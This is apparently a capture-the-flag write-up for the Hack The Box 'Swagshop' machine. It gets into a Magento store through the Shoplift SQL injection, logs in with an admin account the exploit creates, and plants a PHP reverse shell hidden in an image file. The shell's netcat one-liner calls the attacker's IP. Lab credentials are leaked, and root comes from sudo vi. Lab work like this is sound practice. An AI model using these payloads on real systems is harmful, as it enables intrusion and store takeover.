Highway to Root

...because everybody needs to know how deep the rabbit-hole goes.

© 2022. Content on this site is licensed under a Creative Commons Attribution 4.0 International license.

Swagshop - 10.10.10.140

Difficulty score: 6

28 Sep 2019

Write-up by Andrea Melis @wild_boar

USER

Reconnaissance

NMAP

As usual we always start with Nmap scanning:

root@pentestbox:~# nmap -sC -sV -oA swag 10.10.10.140

# Nmap 7.70 scan initiated Thu May 16 14:35:32 2019 as: nmap -sC -sV -p- -oA swag 10.10.10.140
Nmap scan report for 10.10.10.140
Host is up (0.032s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 14:36:21 2019 -- 1 IP address (1 host up) scanned in 49.94 seconds

It seems that apparently only port 80 looks intersting, let’s look what shows.

Appartently looks like a Magento installation.

Let’s use dirb as usual to scan some interesting files.

DirBuster

With dirbuster and big.txt wordlist we found some interesting file such as:

File found: /index.php - 200
Dir found: /css/ - 200
File found: /app/etc/local.xml

Looking at local.xml it seems that there are some mysql creds which we are gonna keep it if required


root
fMVWh7bDHpgZkyfqQXreTjU9

So let’s try to see if there is something intersting on magento, which is a know CMS for e-commerce solutions.

I know magescan, which is a tool to perform enumeration on such CMS, but apperently not interesting results it found:

So next step is to try to see if there is some knon exploits on this versions, which btw magento showed be 1.9.0.0, 1.9.0.1

Exploits

After few research on searchsploit and exploit-db i’ve found one which seems intersting.

It’s a SQL Injection on a admin path /admin/Cms_Wysiwyg/directive/index/, and the PoC of the exploit create a new user with admin privileges as pointed out by the exploit

##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author        : Manish Kishan Tanwar AKA error1046
#Date          : 25/08/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At  : Indishell Lab(originally developed by joren)
##################################################################################################

#////////////////////////
#/// Overview:
#////////////////////////
#
#Magento shoplift bug originally discovered by CheckPoint team (http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/)
#This python script developed by joren but it was having some bug because of which it was not working properly.
#If magento version is vulnerable, this script will create admin account with username forme and password forme

The exploit worked! we just needed to change the url base from “http://10.10.10.140” to “http://10.10.10.140/index.php” because it seems that mode_rewrite url is working.

So that’s it!


python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme

We can now go the admin login page and login with creds forme:forme

An this is the admin panel

Reverse Shell

We can now upload a reverse shell using the connection instance manager of Magento.

i’ve used LavaMagentoBD project which does exactly this, so i don’t need to create a package from scratch.

DAMN! the vuln has been patched so we have to find another way!

Surfing the wev i’ve found this amazing article with another workaround about magento.

https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

So i follow the steps i suggest.

First of all with the admin creds i allow the simlink options

System –> Configuration THEN Advanced –> Developer THEN Template Settings –> Allow Symlinks

Magento it should add a warning, no probl of course.

Then we use a random .png image and we inject this php shell, renmaing also the png with php double extension shell.php.png


echo '< ?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 1337 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

So now we have to create a new thumbnail category so:

Catalog –> Manage Categories THEN a new one, then you give it a new, you abilitate it and then you add as a thumbnail your image:

So now finally, we can run our reverse shell.

All we need to do it’s to go to the newsletter template, create a new one with the payload, and then preview it!

Catalog –> Manage Categories

And then the payload shell.php.png

Save it, and the preview it, and we have our reverse shell!

ROOT

Enumeration

Immediatly after we launched linenum we noticed somenthing strange in the sudoers file.

We are apparently able to exec as www-data /usr/bin/vi for every file in /var/www/html/

So, we can simply open with sudo a file in that folder, and exec bash from vi and .. that’s it!

We have a root shell!

Thank you for reading this write-up. Feedback is appreciated! Happy hacking :)

Related Posts